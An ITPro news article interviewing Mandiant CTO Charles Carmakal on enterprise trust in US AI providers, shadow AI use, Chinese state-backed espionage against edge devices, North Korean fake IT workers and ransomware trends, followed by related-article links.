Foreign AI model launches may have improved trust in US AI developers, says Mandiant CTO – as he warns Chinese cyber attacks are at an “unprecedented level”
Mandiant CTO Charles Carmakal believes AI model security concerns will ultimately improve trust in US providers


Concerns about enterprise AI deployments have faded due to greater understanding of the technology and negative examples in the international community, according to Mandiant CTO Charles Carmakal.
In conversation with ITPro at Google Cloud Next 2025, Carmakal said attitudes among firms who may have been hesitant to adopt the technology are changing rapidly.
This process of coming around to AI, especially at companies like Google, may have been sped up by greater use on an international scale and in territories that are viewed with suspicion by US leaders.
“Honestly, to some extent, I think the introduction of some of the foreign AI models from countries that are maybe perceived to be more risky to Western organizations has probably created a certain level of increased trust of the US-based organizations,” he said.
“Because now the concern is more of using the foreign AI models as opposed to using the domestic ones that people might have a higher level of trust and respect for.”
The past few months have seen major upsets in the AI landscape from the likes of China’s DeepSeek and Qwen. Security experts have issued warnings over security flaws in DeepSeek that allow it to be easily manipulated into generating harmful content, for example.
Carmakal told ITPro this is not a new issue but in fact an extension of shadow IT. Leaders have often found it hard to identify when employees have used forbidden tools, he said, having in the past relied on unreliable interviews with employees or audits of credit card expenses to identify unwarranted cloud spend.
Get the ITPro daily newsletter
Sign up today and you will receive a free copy of our Future Focus 2025 report - the leading guidance on AI, cybersecurity and other IT challenges as per 700+ senior executives
“So we’ve always had a shadow IT problem and right now, we have a scenario where not every company is truly embracing AI and there’s this default fear around “are we going to lose our intellectual property, are people going to become too complacent and too reliant on AI,” he said.
A number of companies decided to impose an outright ban on AI use in response, but Carmakal dismissed this method as one that simply drives employees to hide their AI use by accessing it on personal devices.
Identifying improper use of AI tools and other potential vulnerabilities is a core feature of Google Unified Security, the converged security suite announced by Google Cloud at its annual conference.
The offering uses AI agents to detect when employees interact with tools or files that might pose a threat to their enterprise.
Carmakal expressed a firm belief that AI continues to benefit defenders more than attackers in the current threat landscape, dismissing fears of ‘super malware’ made using AI or other significant AI threats.
Security leaders have previously warned ITPro over the potential threats posed by agentic AI, for example , noting that cyber criminals will likely flock to these tools to ramp up activities.
“Just overall, when we look at our investigation caseload – and we respond to north of a thousand incidents every year – what we find is that AI hasn't meaningfully enabled an adversary to break into an organization,” he stated.
The use of AI for cyber criminal purposes appears to still be in a nascent stage, Carmakal said. Attackers continue to largely use AI for rudimentary purposes such as cutting corners on researching attacks or advice on which commands to create a reverse SSH tunnel.
In comparison, AI could play a role in helping the cybersecurity community to identify both deliberate and unintentional flaws in code, including those in open source software.
“The benefit here is that the AI models, the engines, the knowledge, it's getting better and better and better over time,” Carmakal explained. “And so there are opportunities for us to leverage AI to do some of the things that humans are doing, but do it at a scale that humans can't operate in.”
State-backed threats continue to bite
Sophisticated attacks launched by Chinese state-backed threat actors are among the most prevalent threats facing US businesses, according to a Carmakal, who told ITPro that Mandiant has been dealing with a “very large surge in intrusions by the Chinese government”.
“The espionage in the United States is at an unprecedented level and they're using very clever ways to break into organizations,” he said.
“It's a lot of exploitation of zero day vulnerabilities and edge devices: routers, firewalls, and VPNs.”
Just last week, Mandiant published a report on a newly-discovered critical vulnerability in Ivanti Connect Secure VPN. It connected exploitation of the flaw to China-linked groups and stated it was a sign of the concentrated attacks on edge devices via zero day flaws.
Carmakal also named schemes by North Korean threat actors as a top concern for businesses. The Google Threat Intelligence Group recently warned that fake North Korean IT workers are now branching out to European organizations in a bid to collect money for the regime and extort employers.
“There are a thousand plus people that are North Koreans that are applying for jobs and getting jobs at Western organizations,” he explained.
“For the most part, they're doing work, they're getting a check, and they're using that money to fund a nuclear program.”
Carmakal explained that these threat actors use AI technology such as deepfakes and voice clones to hide their identities, acknowledging that this is among the most prominent examples of malicious AI use he’s seen.
They are also helped by US-based ‘facilitators’ who collect work laptops and necessary company materials on their behalf – sometimes going physically into the office and presenting fake IDs to pose as the hired employee.
In August last year, the cybersecurity firm KnowBe4 accidentally hired a North Korean threat actor who quickly set about installing malware on their work device.
On the issue of ransomware extortion, Carmakal noted that although ransomware payouts are now less common, the sheer volume of attacks remains “very, very high”.
In addition to greater use of AI for security, Carmakal said leaders need to focus on defending against the threats facing their specific organization – and that Google Cloud is able to help identify these.
“I think a lot of folks come to Mandiant and Google because we just have a broad view of the threats that are out there, we have a very broad view of the pragmatic things that companies are doing to defend against today’s threats.”
MORE FROM ITPRO

Rory Bathgate is Features and Multimedia Editor at ITPro, overseeing all in-depth content and case studies. He can also be found co-hosting the ITPro Podcast with Jane McCallion, swapping a keyboard for a microphone to discuss the latest learnings with thought leaders from across the tech sector.
In his free time, Rory enjoys photography, video editing, and good science fiction. After graduating from the University of Kent with a BA in English and American Literature, Rory undertook an MA in Eighteenth-Century Studies at King’s College London. He joined ITPro in 2022 as a graduate, following four years in student journalism. You can contact Rory at rory.bathgate@futurenet.com or on LinkedIn.
-
Bigger salaries, more burnout: Is the CISO role in crisis?
In-depth CISOs are more stressed than ever before – but why is this and what can be done?
By Kate O'Flaherty Published
-
Cheap cyber crime kits can be bought on the dark web for less than $25
News Research from NordVPN shows phishing kits are now widely available on the dark web and via messaging apps like Telegram, and are often selling for less than $25.
By Emma Woollacott Published
-
Security experts issue warning over the rise of 'gray bot' AI web scrapers
News While not malicious, the bots can overwhelm web applications in a way similar to bad actors
By Jane McCallion Published
-
Law enforcement needs to fight fire with fire on AI threats
News UK law enforcement agencies have been urged to employ a more proactive approach to AI-related cyber crime as threats posed by the technology accelerate.
By Emma Woollacott Published
-
OpenAI announces five-fold increase in bug bounty reward
News OpenAI has announced a slew of new cybersecurity initiatives, including a 500% increase to the maximum award for its bug bounty program.
By Jane McCallion Published
-
Hackers are turning to AI tools to reverse engineer millions of apps – and it’s causing havoc for security professionals
News A marked surge in attacks on client-side apps could be due to the growing use of AI tools among cyber criminals, according to new research.
By Emma Woollacott Published
-
Multichannel attacks are becoming a serious threat for enterprises – and AI is fueling the surge
News Organizations are seeing a steep rise in multichannel attacks fueled in part by an uptick in AI cyber crime, new research from SoSafe has found.
By George Fitzmaurice Published
-
12,000 API keys and passwords were found in a popular AI training dataset – experts say the issue is down to poor identity management
Analysis The discovery of almost 12,000 secrets in the archive of a popular AI training dataset is the result of the industry’s inability to keep up with the complexities of machine-machine authentication.
By Solomon Klappholz Published
-
Microsoft is increasing payouts for its Copilot bug bounty program
News Microsoft has expanded the bug bounty program for its Copilot lineup, boosting payouts and adding coverage of WhatsApp and Telegram tools.
By Nicole Kobie Published
-
Tech leaders worry AI innovation is outpacing governance
News Business execs have warned the current rate of AI innovation is outpacing governance practices.
By Emma Woollacott Published